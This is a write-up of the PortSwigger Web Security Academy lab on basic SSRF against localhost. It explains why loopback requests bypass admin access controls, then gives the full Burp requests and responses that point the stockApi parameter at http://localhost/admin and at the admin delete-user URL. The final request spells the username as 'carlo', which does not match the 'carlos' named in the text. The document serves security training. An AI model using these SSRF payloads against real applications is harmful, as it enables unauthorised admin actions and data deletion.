## Basic SSRF against the local server

**Title:** Basic SSRF against the local server. [Go](https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost)

**Description:** This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at `http://localhost/admin` and delete the user `carlos`.
 
## Preface

In an SSRF attack against the server, the attacker causes the application to make an HTTP request back to the server that is hosting the application, via its loopback network interface. This typically involves supplying a URL with a hostname like `127.0.0.1` (a reserved IP address that points to the loopback adapter) or `localhost` (a commonly used name for the same adapter).

For example, imagine a shopping application that lets the user view whether an item is in stock in a particular store. To provide the stock information, the application must query various back-end REST APIs. It does this by passing the URL to the relevant back-end API endpoint via a front-end HTTP request. When a user views the stock status for an item, their browser makes the following request:

``` HTTP
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1
```

This causes the server to make a request to the specified URL, retrieve the stock status, and return this to the user.

In this example, an attacker can modify the request to specify a URL local to the server:

```HTTP
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://localhost/admin
```

The server fetches the contents of the `/admin` URL and returns it to the user.

An attacker can visit the `/admin` URL, but the administrative functionality is normally only accessible to authenticated users. This means an attacker won't see anything of interest. However, if the request to the `/admin` URL comes from the local machine, the normal access controls are bypassed. The application grants full access to the administrative functionality, because the request appears to originate from a trusted location.


Why do applications behave in this way, and implicitly trust requests that come from the local machine? This can arise for various reasons:

- The access control check might be implemented in a different component that sits in front of the application server. When a connection is made back to the server, the check is bypassed.

- For disaster recovery purposes, the application might allow administrative access without logging in, to any user coming from the local machine. This provides a way for an administrator to recover the system if they lose their credentials. This assumes that only a fully trusted user would come directly from the server.

- The administrative interface might listen on a different port number to the main application, and might not be reachable directly by users.

These kind of trust relationships, where requests originating from the local machine are handled differently than ordinary requests, often make SSRF into a critical vulnerability.

## Methodology

### Finding the vulnerable parameter

In this particular lab we are interested in stock check feature.

### My Thought

We browsed `/admin` endpoint and observed that we can't directly access the admin page. Then we visited a product page to intercept the "Check stock" request in Burp Suite, and sent it to Burp Repeater. Changeing the URL in the `stockApi` parameter to `http://localhost/admin`. This should display the administration interface. Reading the HTML to identify the URL to delete the target user, which is `http://localhost/admin/delete?username=carlos`. Submitting this URL in the `stockApi` parameter, to deliver the SSRF attack.

**Request**
``` HTTP
POST /product/stock HTTP/2
Host: 0a68001404005fa584deae17001a0072.web-security-academy.net
Cookie: session=KOygNbKBlQvDMQ7sCuiBLYQHt7rFGX30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a68001404005fa584deae17001a0072.web-security-academy.net/product?productId=6
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Origin: https://0a68001404005fa584deae17001a0072.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

stockApi=http://localhost/admin&storeId=1
```
**Response**
``` HTTP
HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Set-Cookie: session=YPP0UZ5ijO4F8RyCMnOIdom9IrIkCERO; Secure; HttpOnly; SameSite=None
X-Frame-Options: SAMEORIGIN
Content-Length: 3070
```

**Request**
```HTTP
POST /product/stock HTTP/2
Host: 0a68001404005fa584deae17001a0072.web-security-academy.net
Cookie: session=KOygNbKBlQvDMQ7sCuiBLYQHt7rFGX30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a68001404005fa584deae17001a0072.web-security-academy.net/product?productId=6
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Origin: https://0a68001404005fa584deae17001a0072.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

stockApi=http://localhost/admin/delete?username=carlo&storeId=1
```
**Response**
``` HTTP
HTTP/2 302 Found
Location: /admin
Set-Cookie: session=ah22Z18JAEsyU4Fexe6zfDsCqiShibzX; Secure; HttpOnly; SameSite=None
X-Frame-Options: SAMEORIGIN
Content-Length: 0
```
